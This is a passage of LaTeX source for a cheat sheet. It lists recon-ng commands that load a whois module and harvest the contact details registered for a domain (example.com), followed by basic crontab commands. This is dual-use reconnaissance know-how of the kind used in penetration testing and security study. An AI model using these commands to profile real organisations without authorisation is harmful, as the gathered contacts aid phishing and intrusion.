\SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`marketplace install all ; exit`} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`workspaces create demo`} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`modules load \seqsplit{recon/domains-contacts/whois\_pocs`}} \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`options set SOURCE example.com`} \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`run`} \tn % Row Count 6 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`show contacts`} \tn % Row Count 7 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.44 cm} x{4.56 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cron}} \tn % Row 0 \SetRowColor{LightBackground} `crontab -l` & list job entries \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `crontab -e` & edit job entries \tn % Row Count 2 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}